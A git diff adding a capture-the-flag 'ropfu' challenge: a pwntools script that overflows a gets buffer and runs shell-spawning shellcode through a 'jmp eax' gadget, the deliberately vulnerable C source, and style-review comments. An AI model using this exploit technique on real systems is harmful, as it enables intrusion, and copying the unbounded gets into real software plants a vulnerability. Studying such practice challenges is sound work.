diff --git a/pwn/ropfu/solve.py b/pwn/ropfu/solve.py
new file mode 100755
index 0000000..fba671a
--- /dev/null
+++ b/pwn/ropfu/solve.py
@@ -0,0 +1,43 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ pwntools ])"
+
+from pwn import *
+
+exe = ELF("./vuln")
+
+context.binary = exe
+
+ADDR, PORT, *_ = "saturn.picoctf.net 60930".split()
+
+def conn():
+ if args.REMOTE:
+ r = remote(ADDR, PORT)
+ else:
+ r = process([exe.path])
+ return r
+
+def main():
+ r = conn()
+
+ print(r.recvuntil(b"How strong is your ROP-fu? Snatch the shell from my hand, grasshopper!\n"))
+ offset = 28 # found with pwndbg
+
+ rop = ROP(exe)
+
+ jmp_eax = asm('jmp $+0x6') # 2 for jmp + 4 for ret address
+ for _ in range(offset - len(jmp_eax)):
+ rop.raw(asm('nop'))
+ rop.raw(jmp_eax)
+
+ # NOTE: rop.find_gadget(['jmp eax'])[0] Does not work because it does not end with 'ret'
+ jmp_eax_gadget = next(exe.search(asm("jmp eax")))
+ rop.raw(jmp_eax_gadget)
+
+ rop.raw(asm(shellcraft.i386.linux.sh()))
+
+ r.sendline(rop.chain())
+ r.interactive()
+ r.close()
+
+if __name__ == "__main__":
+ main()
diff --git a/pwn/ropfu/vuln b/pwn/ropfu/vuln
new file mode 100755
index 0000000..30fc8d9
Binary files /dev/null and b/pwn/ropfu/vuln differ
diff --git a/pwn/ropfu/vuln.c b/pwn/ropfu/vuln.c
new file mode 100644
index 0000000..06c6719
--- /dev/null
+++ b/pwn/ropfu/vuln.c
@@ -0,0 +1,27 @@
+#include
+#include
+#include
+#include
+#include
+
+#define BUFSIZE 16
+
+void vuln() {
+ char buf[16];
+ printf("How strong is your ROP-fu? Snatch the shell from my hand, grasshopper!\n");
+ return gets(buf);
+
+}
+
+int main(int argc, char **argv){
+
+ setvbuf(stdout, NULL, _IONBF, 0);
+
+
+ // Set the gid to the effective gid
+ // this prevents /bin/sh from dropping the privileges
+ gid_t gid = getegid();
+ setresgid(gid, gid, gid);
+ vuln();
+
+}
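Review bot: `exe = ELF("./vuln")` at module level resolves the binary relative to the current working directory, so running the script from anywhere other than `pwn/ropfu/` fails at import time before `main()` is reached; anchoring it to the script's own location, `exe = ELF(os.path.join(os.path.dirname(os.path.abspath(__file__)), "vuln"))` (with an explicit `import os` rather than relying on the star import), keeps the same behaviour from the repo root. The padding loop `for _ in range(offset - len(jmp_eax)): rop.raw(asm('nop'))` assembles one byte per iteration; `rop.raw(asm('nop') * (offset - len(jmp_eax)))` is a single call and reads as the intended filler. `offset = 28 # found with pwndbg` records where the number came from but not what the 28 bytes span, so a reader cannot re-derive it if the binary is rebuilt; a module-level `OFFSET = 28` with the comment extended to say what is being measured would make the script self-explanatory.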
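Review bot: `return gets(buf);` returns a value from the `void` function `vuln`, which is a constraint violation in C that compilers at least warn about, and the unbounded `gets` is the intended weakness of this challenge source; the bounded form a non-challenge reader should take away is `fgets(buf, sizeof buf, stdin);` followed by a plain `return;`. `#define BUFSIZE 16` is never used — `char buf[16]` repeats the literal, so the two can silently drift apart; `char buf[BUFSIZE];` ties them together. `setresgid(gid, gid, gid);` discards its return value, so if the call fails the intent stated in the comment above it is not met and nothing reports it; checking the result and exiting on failure makes the privilege setup observable. The `#include` lines appear with their header names missing in this rendering, presumably the angle-bracketed names were dropped during extraction rather than absent in the committed file.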